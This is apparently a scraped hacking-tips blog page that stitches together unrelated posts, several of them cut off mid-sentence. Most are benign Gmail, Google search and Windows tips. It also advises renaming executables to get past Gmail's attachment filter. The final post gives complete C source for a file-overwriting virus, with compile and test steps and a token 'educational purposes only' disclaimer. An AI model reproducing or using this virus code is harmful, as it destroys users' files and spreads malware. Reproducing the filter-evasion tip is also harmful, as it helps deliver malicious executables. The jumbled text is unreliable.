Gmail's anti-virus technology translates into this: it'll block any file with an EXE, OCX, BAT, COM or DLL extension, even if it's ZIPped up. You can bypass this simply by renaming the file extension to TXT, but don't forget to tell your recipient what you've done, and remember you'll be breaking Google's codes of conduct, so don't make a habit of it.
1
0. Drag and drop
Fancy using all that spare capacity on your Gmail account as a back-up drive? Windows users should install Gmail Drive, while Mac users should check out gDisk instead.

11. Import mail into Gmail
You've got two options here, both of which require you to enable IMAP access in Gmail (under Settings > Forwarding and POP/IMAP). First, import – if necessary – your mailboxes into Thunderbird and then use Gmail Loader.
Gmail loader
IMPORT EMAIL: Upload your Thunderbird mailboxes to your Gmail account quickly and easily
12. Transfer selected messages
If you only want to transfer selected messages without forwarding them, set up your Gmail account in IMAP mode alongside your existing accounts in a supported application (Outlook, Windows Live Mail or Thunderbird), and then simply drag and drop those messages you wish to upload into Gmail.
13. Use multiple Gmail signatures
GeekFG enables you to create multiple HTML signatures for different accounts or requirements. Each is stored as a bookmarklet which you just drag and drop on to the Compose mail window when you want to use it.
14. Custom Gmail signatures
Fancy creating a signature that adds the latest blog post from your site? Assuming your blog has a site feed set up, just download BlogSigs, which also works with Yahoo Mail, Hotmail and Outlook.
Blogsigs
PROMOTE YOUR BLOG: Add a link to your latest blog post to your email signature
-------------------------------------------------------------------------------------------------------



Gmail liberates you from your PC. Once you've set it up and redirected all your mail accounts to it , your email is no longer tied to a single PC. All you need is access to a secure web browser and you're in touch with everyone and everything.
Okay, so you've liberated yourself, but what next? Read on for 14 tips for more advanced users which can simplify how Gmail works and make it more powerful and useful.
1. Back up Gmail
Once you've been seduced by Gmail, it's easy to forget that your email is now inaccessible to you whenever you're offline. Plus, of course, there's no locally stored backup of your mail, however unlikely it is that Google will lose your mail.
If you're happy playing with the command line, and you want an unobtrusive way of backing up messages to your hard drive, check out LifeHacker's excellent guide.
2. Access Gmail offline
Alternatively, back up your Gmail and access it offline at the same time by using a compatible mail client, such as Windows Live Mail or Thunderbird – if you pick the latter, we recommend setting it up via IMAP, in which case you'll also need the Gmail Account Setup add-on.
Make sure your email client is configured to download the entire message and not just mail headers: in Thunderbird check the server settings of your Gmail account; in Windows

25 handy Google search tips and tricks

25 Handy Google search tips and tricks


The good thing about Google is that generally, you don't have to be too precise or bend over backwards to find things.
When you want something specific, though, or just can't find it the old-fashioned way, these tips will bring it right to your fingertips.
1. Add context
Simply typing in a search term is usually enough, but you can help Google along by adding a little more context to your query. The easiest way is with Boolean operators.
For instance, type fish+chips. The most common are + and – for adding and removing elements, but you can also use * as a wildcard, the tilde symbol (top left of your keyboard) for similar terms, and quotes to get only the "exact phrase you type". One that almost nobody uses is |, which means 'or'.
2. Search certain sites
Google doesn't have to look at the entire internet. By adding a 'site: clarification', you can point it to just one page (or, using an 'I' as well, multiple).

Trick To Hide Text In Notepad

A Superb Trick To Hide Text In Notepad

Here is a small trick to hide text inside your windows default text editor i.e Notepad using command prompt, but this trick works only on NTFS file system.

Steps to hide text in a Notepad
1. Open your command prompt Start-->Run and Type cmd

Add Background Wallpaper on your Pendrive

Add Background Wallpaper on your Pendrive

Just Copy the below code to notepad,then save it as "desktop.ini"

How to Move a mouse Pointer without a mouse

How to Move a mouse Pointer without a mouse

You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.

Follow the given steps to activate the keyboard mouse:

Send your name to mars

This is your chance to go to Mars!

Yes not you but your name will go to mars.Your name will be included with others on a microchip on the Mars Science Laboratory rover heading to Mars in 2011!

you will also get certificate..

check the following link

How to Access Banned Facebook

How to Access Banned Facebook

Facebook is now banned in various country. But there method to access blocked facebook in pakistan.One method to access facebook is to use proxy sites.There are many free proxy site online ,Which enable you to access blocked website from any where.Its sad for facebook lovers in pakistan.
Use free proxy to surf anonymously online. Proxy can change to change your IP address, secure your internet connection, hide your internet history and protect your privacy online for free.
Some of free proxy on web are below

How to Create a Computer Virus?

 How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

***************************************************************************
#include
#include

#include

#include

#include

#include



FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
*************************************************************************** 




COMPILING METHOD:


USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect


USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:


1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it


WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE 

LinkWithin

The Hackers Arena